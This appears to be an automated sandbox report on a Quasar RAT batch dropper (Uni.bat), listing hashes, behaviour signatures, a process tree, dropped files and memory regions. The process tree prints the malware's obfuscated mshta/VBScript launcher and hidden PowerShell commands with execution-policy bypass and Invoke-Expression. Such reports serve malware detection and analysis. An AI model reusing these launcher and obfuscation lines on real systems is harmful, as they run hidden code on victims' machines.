Analysis

  • max time kernel
    30s
  • max time network
    26s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-02-2024 17:43

General

  • Target

    Uni.bat

  • Size

    14.9MB

  • MD5

    a04be134083f16f41a3f08162614da27

  • SHA1

    7d90c58f7af0b10cd404da2df22640ac0da75a90

  • SHA256

    b3f58c9c8cdc767f47ba79a89b8562af01bc1c68485a2c453adba2292f84dd26

  • SHA512

    f1270f896c13c191d1bbe443eb66950240d3d39f3b0fed639751fdcf1f3f95e205ce3bee47401e089333b976752aae23ec87163896dc58200c66ed1712973846

  • SSDEEP

    49152:zncqI9jt+YbH6/BYYrunkbDwbSBU0b1W2R+SFLNXtpEmRwbj4VzjI78/CKFTp7J3:L

Score
10/10

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:676
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
    1⤵
      PID:952
    • C:\Windows\system32\dwm.exe
      "dwm.exe"
      1⤵
        PID:316
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
        1⤵
          PID:684
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:948
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:408
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1072
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                1⤵
                  PID:1216
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                  1⤵
                    PID:1256
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1192
                      • C:\Windows\$sxr-mshta.exe
                        C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-qMfAojYxqLWMOUptcaej4312:LfdqWMGt=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                        2⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Modifies registry class
                        • Suspicious use of WriteProcessMemory
                        PID:1876
                        • C:\Windows\$sxr-cmd.exe
                          "C:\Windows\$sxr-cmd.exe" /c %$sxr-qMfAojYxqLWMOUptcaej4312:LfdqWMGt=%
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:2944
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:UbrazmCGEu; "
                            4⤵
                              PID:2080
                            • C:\Windows\$sxr-powershell.exe
                              C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
                              4⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4300
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                        1⤵
                          PID:1084
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1308
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                            1⤵
                              PID:1992
                            • C:\Windows\sysmon.exe
                              C:\Windows\sysmon.exe
                              1⤵
                                PID:2796
                              • C:\Windows\System32\spoolsv.exe
                                C:\Windows\System32\spoolsv.exe
                                1⤵
                                  PID:2116
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                  1⤵
                                    PID:1948
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                    1⤵
                                      PID:1320
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                      1⤵
                                        PID:2004
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                        1⤵
                                          PID:1868
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                          1⤵
                                            PID:1780
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1756
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                              1⤵
                                                PID:1700
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                1⤵
                                                  PID:1644
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                  1⤵
                                                    PID:1584
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                    1⤵
                                                      PID:1524
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                      1⤵
                                                        PID:1508
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                        1⤵
                                                          PID:1432
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                          1⤵
                                                            PID:1408
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
                                                            1⤵
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:4688
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:VINrjdIMAm; "
                                                              2⤵
                                                                PID:116
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
                                                                2⤵
                                                                • Deletes itself
                                                                • Drops file in Windows directory
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4624

                                                            Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                              Filesize

                                                              53KB

                                                              MD5

                                                              a26df49623eff12a70a93f649776dab7

                                                              SHA1

                                                              efb53bd0df3ac34bd119adf8788127ad57e53803

                                                              SHA256

                                                              4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                                                              SHA512

                                                              e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gzwykosd.xeh.ps1

                                                              Filesize

                                                              60B

                                                              MD5

                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                              SHA1

                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                              SHA256

                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                              SHA512

                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                            • C:\Windows\$sxr-cmd.exe

                                                              Filesize

                                                              283KB

                                                              MD5

                                                              8a2122e8162dbef04694b9c3e0b6cdee

                                                              SHA1

                                                              f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                                                              SHA256

                                                              b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                                                              SHA512

                                                              99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

                                                            • C:\Windows\$sxr-mshta.exe

                                                              Filesize

                                                              14KB

                                                              MD5

                                                              0b4340ed812dc82ce636c00fa5c9bef2

                                                              SHA1

                                                              51c97ebe601ef079b16bcd87af827b0be5283d96

                                                              SHA256

                                                              dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

                                                              SHA512

                                                              d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

                                                            • C:\Windows\$sxr-powershell.exe

                                                              Filesize

                                                              442KB

                                                              MD5

                                                              04029e121a0cfa5991749937dd22a1d9

                                                              SHA1

                                                              f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                              SHA256

                                                              9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                              SHA512

                                                              6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                            • memory/316-113-0x00007FFF19E50000-0x00007FFF19E60000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/316-116-0x000002CB3E660000-0x000002CB3E689000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/316-115-0x000002CB3E660000-0x000002CB3E689000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/316-168-0x000002CB3E660000-0x000002CB3E689000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/408-120-0x00007FFF19E50000-0x00007FFF19E60000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/408-128-0x000001E15EC60000-0x000001E15EC89000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/408-121-0x000001E15EC60000-0x000001E15EC89000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/408-122-0x000001E15EC60000-0x000001E15EC89000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/676-99-0x0000019D9A4E0000-0x0000019D9A509000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/676-148-0x0000019D9A4E0000-0x0000019D9A509000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/676-97-0x00007FFF19E50000-0x00007FFF19E60000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/676-101-0x0000019D9A4E0000-0x0000019D9A509000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/676-95-0x0000019D9A4E0000-0x0000019D9A509000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/676-94-0x0000019D9A4B0000-0x0000019D9A4D2000-memory.dmp

                                                              Filesize

                                                              136KB

                                                            • memory/676-98-0x00007FFF59E6D000-0x00007FFF59E6E000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/684-130-0x00007FFF19E50000-0x00007FFF19E60000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/684-132-0x000001D183B60000-0x000001D183B89000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/684-133-0x000001D183B60000-0x000001D183B89000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/948-142-0x0000016187D60000-0x0000016187D89000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/948-139-0x00007FFF19E50000-0x00007FFF19E60000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/948-141-0x0000016187D60000-0x0000016187D89000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/948-138-0x0000016187D60000-0x0000016187D89000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/952-110-0x00007FFF59E6C000-0x00007FFF59E6D000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/952-105-0x00007FFF19E50000-0x00007FFF19E60000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/952-108-0x0000024270450000-0x0000024270479000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/952-106-0x0000024270450000-0x0000024270479000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/952-158-0x0000024270450000-0x0000024270479000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/1072-146-0x00007FFF19E50000-0x00007FFF19E60000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/1072-150-0x000001FC92B10000-0x000001FC92B39000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/1072-147-0x000001FC92B10000-0x000001FC92B39000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/1084-154-0x00007FFF19E50000-0x00007FFF19E60000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/1084-155-0x000001C0ECDC0000-0x000001C0ECDE9000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/1084-156-0x000001C0ECDC0000-0x000001C0ECDE9000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/1084-159-0x000001C0ECDC0000-0x000001C0ECDE9000-memory.dmp

                                                              Filesize

                                                              164KB

                                                            • memory/4300-79-0x000001E569720000-0x000001E569C68000-memory.dmp

                                                              Filesize

                                                              5.3MB

                                                            • memory/4300-96-0x000001E53F690000-0x000001E53F6A0000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/4300-72-0x00007FFF582F0000-0x00007FFF583AE000-memory.dmp

                                                              Filesize

                                                              760KB

                                                            • memory/4300-73-0x00007FFF59DD0000-0x00007FFF59FC5000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/4300-74-0x00007FFF59DD0000-0x00007FFF59FC5000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/4300-140-0x000001E53F690000-0x000001E53F6A0000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/4300-76-0x00007FFF59DD0000-0x00007FFF59FC5000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/4300-77-0x000001E5273A0000-0x000001E5273A6000-memory.dmp

                                                              Filesize

                                                              24KB

                                                            • memory/4300-78-0x000001E53F680000-0x000001E53F686000-memory.dmp

                                                              Filesize

                                                              24KB

                                                            • memory/4300-70-0x000001E5604F0000-0x000001E560B8C000-memory.dmp

                                                              Filesize

                                                              6.6MB

                                                            • memory/4300-80-0x000001E569C70000-0x000001E56A414000-memory.dmp

                                                              Filesize

                                                              7.6MB

                                                            • memory/4300-81-0x000001E56A410000-0x000001E56A798000-memory.dmp

                                                              Filesize

                                                              3.5MB

                                                            • memory/4300-82-0x000001E56A7A0000-0x000001E56A852000-memory.dmp

                                                              Filesize

                                                              712KB

                                                            • memory/4300-137-0x00007FFF59DD0000-0x00007FFF59FC5000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/4300-129-0x00007FFF59DD0000-0x00007FFF59FC5000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/4300-86-0x000001E56A890000-0x000001E56A8FA000-memory.dmp

                                                              Filesize

                                                              424KB

                                                            • memory/4300-87-0x000001E56A900000-0x000001E56A940000-memory.dmp

                                                              Filesize

                                                              256KB

                                                            • memory/4300-91-0x0000000180000000-0x0000000180007000-memory.dmp

                                                              Filesize

                                                              28KB

                                                            • memory/4300-67-0x000001E53F690000-0x000001E53F6A0000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/4300-66-0x00007FFF3BE20000-0x00007FFF3C8E1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/4300-123-0x00007FFF3BE20000-0x00007FFF3C8E1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/4300-124-0x000001E53F690000-0x000001E53F6A0000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/4300-71-0x000001E568B90000-0x000001E569278000-memory.dmp

                                                              Filesize

                                                              6.9MB

                                                            • memory/4624-32-0x0000023F2A940000-0x0000023F2A976000-memory.dmp

                                                              Filesize

                                                              216KB

                                                            • memory/4624-24-0x0000023F29AE0000-0x0000023F29B3E000-memory.dmp

                                                              Filesize

                                                              376KB

                                                            • memory/4624-37-0x0000023F2A9E0000-0x0000023F2A9E8000-memory.dmp

                                                              Filesize

                                                              32KB

                                                            • memory/4624-35-0x00007FF716650000-0x00007FF7166C1000-memory.dmp

                                                              Filesize

                                                              452KB

                                                            • memory/4624-34-0x0000023F29BC0000-0x0000023F29BEE000-memory.dmp

                                                              Filesize

                                                              184KB

                                                            • memory/4624-33-0x0000023F2A980000-0x0000023F2A9D8000-memory.dmp

                                                              Filesize

                                                              352KB

                                                            • memory/4624-45-0x00007FFF3B598000-0x00007FFF3B599000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/4624-31-0x0000023F2A890000-0x0000023F2A942000-memory.dmp

                                                              Filesize

                                                              712KB

                                                            • memory/4624-30-0x0000023F29C70000-0x0000023F2A890000-memory.dmp

                                                              Filesize

                                                              12.1MB

                                                            • memory/4624-29-0x0000023F29C30000-0x0000023F29C6E000-memory.dmp

                                                              Filesize

                                                              248KB

                                                            • memory/4624-28-0x0000023F29AC0000-0x0000023F29AC6000-memory.dmp

                                                              Filesize

                                                              24KB

                                                            • memory/4624-27-0x0000023F66840000-0x0000023F66848000-memory.dmp

                                                              Filesize

                                                              32KB

                                                            • memory/4624-55-0x00007FFF3BE20000-0x00007FFF3C8E1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/4624-56-0x0000023F7EB20000-0x0000023F7EB30000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/4624-26-0x0000023F29AB0000-0x0000023F29AB6000-memory.dmp

                                                              Filesize

                                                              24KB

                                                            • memory/4624-85-0x00007FFF59DD0000-0x00007FFF59FC5000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/4624-25-0x0000023F29B40000-0x0000023F29B98000-memory.dmp

                                                              Filesize

                                                              352KB

                                                            • memory/4624-38-0x0000000180000000-0x0000000180007000-memory.dmp

                                                              Filesize

                                                              28KB

                                                            • memory/4624-23-0x0000023F29AD0000-0x0000023F29AD6000-memory.dmp

                                                              Filesize

                                                              24KB

                                                            • memory/4624-84-0x00007FFF3BE20000-0x00007FFF3C8E1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/4624-22-0x0000023F29A90000-0x0000023F29AB2000-memory.dmp

                                                              Filesize

                                                              136KB

                                                            • memory/4624-21-0x0000023F29990000-0x0000023F29A8C000-memory.dmp

                                                              Filesize

                                                              1008KB

                                                            • memory/4624-75-0x00007FFF59DD0000-0x00007FFF59FC5000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/4624-20-0x00007FFF59DD0000-0x00007FFF59FC5000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/4624-19-0x00007FFF59DD0000-0x00007FFF59FC5000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/4624-18-0x00007FFF59DD0000-0x00007FFF59FC5000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/4624-17-0x00007FFF582F0000-0x00007FFF583AE000-memory.dmp

                                                              Filesize

                                                              760KB

                                                            • memory/4624-16-0x0000023F28AA0000-0x0000023F2958C000-memory.dmp

                                                              Filesize

                                                              10.9MB

                                                            • memory/4624-15-0x0000023F28000000-0x0000023F28AA0000-memory.dmp

                                                              Filesize

                                                              10.6MB

                                                            • memory/4624-14-0x0000023F7F9A0000-0x0000023F7FA16000-memory.dmp

                                                              Filesize

                                                              472KB

                                                            • memory/4624-13-0x0000023F7F8D0000-0x0000023F7F914000-memory.dmp

                                                              Filesize

                                                              272KB

                                                            • memory/4624-12-0x0000023F7EB20000-0x0000023F7EB30000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/4624-11-0x0000023F7EB20000-0x0000023F7EB30000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/4624-10-0x00007FFF3BE20000-0x00007FFF3C8E1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/4624-1-0x0000023F7EAF0000-0x0000023F7EB12000-memory.dmp

                                                              Filesize

                                                              136KB